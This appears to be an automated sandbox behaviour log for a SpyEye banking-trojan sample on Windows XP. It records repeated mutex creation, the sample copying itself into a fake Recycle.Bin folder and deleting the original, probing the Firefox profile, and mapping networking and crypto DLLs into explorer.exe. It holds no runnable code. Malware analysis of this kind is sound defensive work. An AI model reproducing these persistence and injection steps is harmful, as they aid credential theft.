Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1991402628
Thread delayed Time: 0 TID: 13924 success or wait 1991402999
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1991794092
Thread delayed Time: 0 TID: 13924 success or wait 1991794467
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1992185549
Thread delayed Time: 0 TID: 13924 success or wait 1992186587
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1992576695
Thread delayed Time: 0 TID: 13924 success or wait 1992577194
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1992968317
Thread delayed Time: 0 TID: 13924 success or wait 1992968689
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1993359730
Thread delayed Time: 0 TID: 13924 success or wait 1993360101
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1993751410
Thread delayed Time: 0 TID: 13924 success or wait 1993751781
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1994143160
Thread delayed Time: 0 TID: 13924 success or wait 1994143534
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1994534651
Thread delayed Time: 0 TID: 13924 success or wait 1994535117
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1994926106
Thread delayed Time: 0 TID: 13924 success or wait 1994927181
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1995317590
Thread delayed Time: 0 TID: 13924 success or wait 1995317952
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1995709179
Thread delayed Time: 0 TID: 13924 success or wait 1995709542
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1996101970
Thread delayed Time: 0 TID: 13924 success or wait 1996102263
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1996492232
Thread delayed Time: 0 TID: 13924 success or wait 1996492606
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1996883675
Thread delayed Time: 0 TID: 13924 success or wait 1996884171
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1997275116
Thread delayed Time: 0 TID: 13924 success or wait 1997275562
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1997745910
Thread delayed Time: 0 TID: 13924 success or wait 1997754404
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1998114084
Thread delayed Time: 0 TID: 13924 success or wait 1998114455
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1998505716
Thread delayed Time: 0 TID: 13924 success or wait 1998506087
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1998900058
Thread delayed Time: 0 TID: 13924 success or wait 1998900432
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1999288706
Thread delayed Time: 0 TID: 13924 success or wait 1999289588
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1999680196
Thread delayed Time: 0 TID: 13924 success or wait 1999680653
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 2000071713
Thread delayed Time: 0 TID: 13924 success or wait 2000072085
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 2000467983
Thread delayed Time: 0 TID: 13924 success or wait 2000472222
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 2002662056
Thread delayed Time: 0 TID: 13924 success or wait 2002662432
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 2003360601
Thread delayed Time: 0 TID: 13924 success or wait 2003360975
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 2003730181
Thread delayed Time: 0 TID: 13924 success or wait 2003731788
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 2004155625
Thread delayed Time: 0 TID: 13924 success or wait 2004297182
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 2004736136
Thread delayed Time: 0 TID: 13924 success or wait 2004738843
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 2005179286
Thread delayed Time: 0 TID: 13924 success or wait 2005180977
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 2005732387
Thread delayed Time: 0 TID: 13924 success or wait 2005733393
Thread delayed Time: 0 TID: 13924 success or wait 2006296561
Thread delayed Time: 0 TID: 13924 success or wait 2006848816
Mutant created Name: \BaseNamedObjects\Global\System64 object name exists 2014624688
Process terminated PID: 3660 Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe success or wait 2017169032
+ Sections
+ General
Start time: 05:47:52
Start date: 01/12/2011
Path: C:\WINDOWS\explorer.exe
Commandline: C:\WINDOWS\Explorer.EXE
Imagebase: 0x1000000
File size: 1033728 bytes
MD5 hash: 12896823FB95BFB3DC9B46BCAEDC9923
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\WINDOWS\system32\wininet.dll synchronize and generic read synchronous io non alert and non directory file and random access success or wait 64 BAE1D35
C:\WINDOWS\system32\ntdll.dll read data or list directory and read ea and read attributes and synchronize synchronous io non alert and non directory file false success or wait 2 181083B
C:\Recycle.Bin\ read attributes and synchronize and generic write synchronous io non alert and non directory file false file is a directory 1 1810B14
C:\Recycle.Bin\ read attributes and synchronize and generic write synchronous io non alert and open for backup ident false success or wait 1 1810B14
C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 18106D9
C:\Recycle.Bin\B6232F3AC2C.exe read attributes and synchronize and generic write synchronous io non alert and non directory file false success or wait 2 1810B14
C:\WINDOWS\system32\ntdll.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 23 BAD6A36
C:\Recycle.Bin\07A49F015E0D693 read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 2 BB74E4E
C:\WINDOWS\system32\USER32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BB56A36
C:\WINDOWS\system32\WININET.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 4 BB56A36
C:\WINDOWS\system32\WS2_32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BB56A36
C:\WINDOWS\system32\ADVAPI32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BB56A36
C:\WINDOWS\system32\CRYPT32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BB56A36
C:\Recycle.Bin\07A49F015E0D693 read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6346
C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\profiles.ini read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 BAF4E4E
+ File created
File Path Access Attributes Options Completion Count Source Address
C:\Recycle.Bin\ read data or list directory and synchronize normal directory file and synchronous io non alert and open for backup ident object name collision 1 18100EF
C:\Recycle.Bin\B6232F3AC2C.exe read attributes and synchronize and generic write normal synchronous io non alert and non directory file success or wait 1 1810B14
+ File deleted
File Path Completion Count Source Address
C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe cannot delete 5 181093C
C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe success or wait 1 181093C
+ File written
File Path Offset Length Value Completion Count Source Address
C:\Recycle.Bin\B6232F3AC2C.exe none 254976 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 1 181066C
+ File read
File Path Offset Length Value Completion Count Source Address
C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe none 254976 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 1 1810764
C:\WINDOWS\system32\ntdll.dll none 4 D0 00 00 00 success or wait 23 BAD6699
C:\WINDOWS\system32\ntdll.dll none 20 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 23 BAD66D5
C:\WINDOWS\system32\ntdll.dll none 224 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 23 BAD6717
C:\WINDOWS\system32\ntdll.dll none 160 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 23 BAD67A2
C:\Recycle.Bin\07A49F015E0D693 none 5934 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2 BB6818F
C:\WINDOWS\system32\user32.dll none 4 D8 00 00 00 success or wait 1 BB56699
C:\WINDOWS\system32\user32.dll none 20 4C 01 04 00 1B A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BB566D5
C:\WINDOWS\system32\user32.dll none 224 0B 01 07 0A 00 F4 05 00 00 E2 02 00 00 00 00 00 17 B2 00 00 00 10 00 00 00 B0 05 00 00 00 41 7E 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 10 09 00 00 04 00 00 76 FC 08 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 39 00 00 success or wait 1 BB56717
C:\WINDOWS\system32\user32.dll none 160 2E 74 65 78 74 00 00 00 83 F2 05 00 00 10 00 00 00 F4 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 80 11 00 00 00 10 06 00 00 0C 00 00 00 F8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 88 A0 02 00 00 30 06 00 00 A2 02 00 success or wait 1 BB567A2
C:\WINDOWS\system32\wininet.dll none 4 F8 00 00 00 success or wait 4 BB56699
C:\WINDOWS\system32\wininet.dll none 20 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 4 BB566D5
C:\WINDOWS\system32\wininet.dll none 224 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 4 BB56717
C:\WINDOWS\system32\wininet.dll none 160 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 4 BB567A2
C:\WINDOWS\system32\ws2_32.dll none 4 F0 00 00 00 success or wait 1 BB56699
C:\WINDOWS\system32\ws2_32.dll none 20 4C 01 04 00 63 A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BB566D5
C:\WINDOWS\system32\ws2_32.dll none 224 0B 01 07 0A 00 22 01 00 00 1C 00 00 00 00 00 00 73 12 00 00 00 10 00 00 00 20 01 00 00 00 AB 71 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 70 01 00 00 04 00 00 20 F0 01 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 04 14 00 00 success or wait 1 BB56717
C:\WINDOWS\system32\ws2_32.dll none 160 2E 74 65 78 74 00 00 00 53 21 01 00 00 10 00 00 00 22 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 14 09 00 00 00 40 01 00 00 0A 00 00 00 26 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 F8 03 00 00 00 50 01 00 00 04 00 00 success or wait 1 BB567A2
C:\WINDOWS\system32\advapi32.dll none 4 F0 00 00 00 success or wait 1 BB56699
C:\WINDOWS\system32\advapi32.dll none 20 4C 01 04 00 48 1D 90 49 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BB566D5
C:\WINDOWS\system32\advapi32.dll none 224 0B 01 07 0A 00 46 07 00 00 3E 02 00 00 00 00 00 0B 71 00 00 00 10 00 00 00 20 07 00 00 00 DD 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 B0 09 00 00 04 00 00 B8 5B 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 A4 16 00 00 success or wait 1 BB56717
C:\WINDOWS\system32\advapi32.dll none 160 2E 74 65 78 74 00 00 00 C9 45 07 00 00 10 00 00 00 46 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 28 46 00 00 00 60 07 00 00 2C 00 00 00 4A 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 80 A9 01 00 00 B0 07 00 00 AA 01 00 success or wait 1 BB567A2
C:\WINDOWS\system32\crypt32.dll none 4 F0 00 00 00 success or wait 1 BB56699
C:\WINDOWS\system32\crypt32.dll none 20 4C 01 04 00 D7 A0 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BB566D5
C:\WINDOWS\system32\crypt32.dll none 224 0B 01 07 0A 00 44 08 00 00 DC 00 00 00 00 00 00 32 16 00 00 00 10 00 00 00 20 08 00 00 00 A8 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 50 09 00 00 04 00 00 30 C5 09 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 9C 1A 00 00 success or wait 1 BB56717
C:\WINDOWS\system32\crypt32.dll none 160 2E 74 65 78 74 00 00 00 C4 43 08 00 00 10 00 00 00 44 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 E8 23 00 00 00 60 08 00 00 24 00 00 00 48 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 50 67 00 00 00 90 08 00 00 68 00 00 success or wait 1 BB567A2
C:\Recycle.Bin\07A49F015E0D693 none 4 03 12 C0 79 success or wait 1 BAD637F
C:\Recycle.Bin\B6232F3AC2C.exe none 254976 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 1 BAE818F
+ Other file operations
File Path Disposition Data Ascii Data Completion Count Source Address
C:\Recycle.Bin BasicInformation 00000000000000000000000000000000000000000000000000000000000000008200000000000000 success or wait 2 1810129
C:\Recycle.Bin\B6232F3AC2C.exe BasicInformation 00A013805E3CC601ECCB1BD32FB0CC0180FC04DEB397CB0100000000000000000000000000000000 success or wait 1 18108C4
C:\WINDOWS\system32\ntdll.dll PositionInformation Offset: 60 success or wait 92 BAD667A
C:\WINDOWS\system32\user32.dll PositionInformation Offset: 60 success or wait 4 BB5667A
C:\WINDOWS\system32\wininet.dll PositionInformation Offset: 60 success or wait 16 BB5667A
C:\WINDOWS\system32\ws2_32.dll PositionInformation Offset: 60 success or wait 4 BB5667A
C:\WINDOWS\system32\advapi32.dll PositionInformation Offset: 60 success or wait 4 BB5667A
C:\WINDOWS\system32\crypt32.dll PositionInformation Offset: 60 success or wait 4 BB5667A
C:\Recycle.Bin\07A49F015E0D693 PositionInformation Offset: 5930 success or wait 1 BAD6366
C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Ctrl code set: 110008 NULL no status 0 BAE4F00
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
C:\Recycle.Bin\B6232F3AC2C.exe query and write and read and execute and extend size image BD0000 65536 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 2850000 1208320 own pid readonly success or wait 1
C:\Recycle.Bin\B6232F3AC2C.exe query and read commit 2130000 258048 own pid readonly success or wait 1
none query and write and read commit 1FC0000 16384 own pid read write success or wait 1
C:\WINDOWS\system32\mswsock.dll write and read and execute commit 2950000 245760 own pid execute success or wait 1
C:\WINDOWS\system32\mswsock.dll query and write and read and execute image 71A50000 258048 own pid read write success or wait 1
\KnownDlls\DNSAPI.dll write and read and execute unknown 71A50000 258048 own pid read write object name not found 1
C:\WINDOWS\system32\dnsapi.dll query and write and read and execute image 76F20000 159744 own pid read write success or wait 1
C:\WINDOWS\system32\winrnr.dll write and read and execute commit 1F80000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\winrnr.dll query and write and read and execute image 76FB0000 32768 own pid read write success or wait 1
\KnownDlls\rasadhlp.dll write and read and execute unknown 76FB0000 32768 own pid read write object name not found 1
C:\WINDOWS\system32\rasadhlp.dll query and write and read and execute image 76FC0000 24576 own pid read write success or wait 1
\KnownDlls\RASAPI32.dll write and read and execute unknown 2A10000 942080 own pid readonly object name not found 1
C:\WINDOWS\system32\rasapi32.dll query and write and read and execute image 76EE0000 245760 own pid read write success or wait 1
\KnownDlls\rasman.dll write and read and execute unknown 76EE0000 245760 own pid read write object name not found 1
C:\WINDOWS\system32\rasman.dll query and write and read and execute image 76E90000 73728 own pid read write success or wait 1
\KnownDlls\TAPI32.dll write and read and execute unknown 76E90000 73728 own pid read write object name not found 1
C:\WINDOWS\system32\tapi32.dll query and write and read and execute image 76EB0000 192512 own pid read write success or wait 1
C:\WINDOWS\system32\tapi32.dll read commit 2950000 184320 own pid readonly success or wait 1
\KnownDlls\sensapi.dll write and read and execute unknown 2950000 184320 own pid readonly object name not found 1
C:\WINDOWS\system32\sensapi.dll query and write and read and execute image 722B0000 20480 own pid read write success or wait 1
\KnownDlls\msapsspc.dll write and read and execute unknown 722B0000 20480 own pid read write object name not found 1
C:\WINDOWS\system32\msapsspc.dll query and write and read and execute image 71E50000 86016 own pid read write success or wait 1
\KnownDlls\MSVCRT40.dll write and read and execute unknown 71E50000 86016 own pid read write object name not found 1
C:\WINDOWS\system32\msvcrt40.dll query and write and read and execute image 78080000 69632 own pid read write success or wait 1
\BaseNamedObjects\SENS Information Cache read unknown 1FA0000 4096 own pid readonly success or wait 1
\KnownDlls\schannel.dll write and read and execute unknown 1FA0000 4096 own pid readonly object name not found 1
C:\WINDOWS\system32\schannel.dll query and write and read and execute image 767F0000 163840 own pid read write success or wait 1
\KnownDlls\digest.dll write and read and execute unknown 767F0000 163840 own pid read write object name not found 1
C:\WINDOWS\system32\digest.dll query and write and read and execute image 75B00000 86016 own pid read write success or wait 1
\KnownDlls\msnsspc.dll write and read and execute unknown 75B00000 86016 own pid read write object name not found 1
C:\WINDOWS\system32\msnsspc.dll query and write and read and execute image 747B0000 290816 own pid read write success or wait 1
\KnownDlls\MSVCRT40.dll write and read and execute unknown 747B0000 290816 own pid read write object name not found 1
C:\WINDOWS\system32\msvcrt40.dll query and write and read and execute image 78080000 69632 own pid read write success or wait 1
C:\WINDOWS\system32\msv1_0.dll write and read and execute commit 2950000 139264 own pid execute success or wait 1
C:\WINDOWS\system32\msv1_0.dll query and write and read and execute image 77C70000 151552 own pid read write success or wait 1
\KnownDlls\cryptdll.dll write and read and execute unknown 77C70000 151552 own pid read write object name not found 1
C:\WINDOWS\system32\cryptdll.dll query and write and read and execute image 76790000 49152 own pid read write success or wait 1
\KnownDlls\MPRAPI.dll write and read and execute unknown 76790000 49152 own pid read write object name not found 1
C:\WINDOWS\system32\mprapi.dll query and write and read and execute image 76D40000 98304 own pid read write success or wait 1
\KnownDlls\ACTIVEDS.dll write and read and execute unknown 76D40000 98304 own pid read write object name not found 1
C:\WINDOWS\system32\activeds.dll query and write and read and execute image 77CC0000 204800 own pid read write success or wait 1
\KnownDlls\adsldpc.dll write and read and execute unknown 77CC0000 204800 own pid read write object name not found 1
C:\WINDOWS\system32\adsldpc.dll query and write and read and execute image 76E10000 151552 own pid read write success or wait 1
\KnownDlls\hnetcfg.dll write and read and execute unknown 76E10000 151552 own pid read write object name not found 1
C:\WINDOWS\system32\hnetcfg.dll query and write and read and execute image 662B0000 360448 own pid read write success or wait 1
C:\WINDOWS\system32\wshtcpip.dll write and read and execute commit 2960000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\wshtcpip.dll query and write and read and execute image 71A90000 32768 own pid read write success or wait 1
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1F70000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1F70000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BB56A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BB56A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BB56A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BB56A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BB56A8A
\KnownDlls\nspr4.dll write and read and execute unknown 1FC0000 65536 own pid readonly object name not found 1 BB71523
C:\WINDOWS\system32\ntdll.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\user32.dll query and read commit 1FC0000 57344 own pid readonly success or wait 1 BB56A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BB56A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BB56A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BB56A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BB56A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ws2_32.dll query and read commit 1FC0000 20480 own pid readonly success or wait 1 BB56A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\advapi32.dll query and read commit 1FC0000 28672 own pid readonly success or wait 1 BB56A8A
C:\WINDOWS\system32\crypt32.dll query and read commit 2950000 77824 own pid readonly success or wait 1 BB56A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1F70000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1F70000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
